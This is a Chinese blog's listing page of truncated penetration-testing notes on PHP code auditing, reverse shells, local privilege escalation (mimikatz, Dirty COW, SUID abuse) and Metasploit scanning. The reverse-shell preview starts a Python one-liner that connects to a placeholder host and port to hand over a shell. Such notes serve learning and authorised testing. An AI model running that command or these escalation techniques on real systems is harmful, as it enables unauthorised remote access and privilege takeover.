笔记
关注
分享
扫一扫
文章平均质量分 79
~~...
菜鸟
展开
-
php代码审计
代码审计基础配置常量定义配置选项 基础配置 常量定义 1.PHP_INI_USER PHP脚本,windows注册表中设置 2.PHP_INI_PERDIR php.ini htaccess,httpd.conf中设置 3.PHP_INI_SYSTEMphp.ini httpd.conf中设置 4.PHP_INI_ALL 任何地方中设置 5.php.ini only php原创 2020-06-03 18:44:55 · 776 阅读 · 0 评论 -
反弹shell
反弹shellpythonphp python 弹出终端 python -c 'import pty; pty.spawn("/bin/bash")' python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("ip",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(原创 2020-06-02 00:52:55 · 342 阅读 · 0 评论 -
本地提权
本地提权windowSysinternalsSuite->PsExec.exe利用系统命令进程注入pinjector.exe(隐蔽)fgdumpmimikatzwin缓存密码linux脏牛suid/etc/passwd文件的配置不当sudo组 window 常见window权限: 普通用户:user 管理员:administrator 系统:system admin->system SysinternalsSuite->PsExec.exe 微软发布的一套非常强大的免费工具程序集 Ps原创 2020-06-01 21:51:29 · 682 阅读 · 0 评论 -
Metasploit端口扫描
Metasploit nmap 高级扫描(伪装 成空闲主机对目标探测:递增ip帧标识机制) 利用 Metasploit 中 auxiliary/scanner/ip/ipidseq模块扫描 空闲主机 设置参数 :RHOSTS [IP](网段,ip列表文件,地址范围) THREADS 线程数 使用nmap -sI 命令 开始扫描Msf 终端中使用nmap 先连接数据库 db_connect ...原创 2020-03-21 17:31:46 · 702 阅读 · 0 评论 -
Metasploit 中使用数据库 将nmap输出导入数据库
Metasploit 支持Mysql ,Postgresql ,SQLlite3 三种数据库连接 默认使用PostgreSQL 先启动数据库 /etc/init.d/postgresql start 进入 msf终端 建立数据库连接 (PostgreSQL 默认用户名密码 postgres:toor)msf为数据库名 db_connect postgres:toor@127.0.0.1/msf ...原创 2020-03-21 00:14:25 · 721 阅读 · 0 评论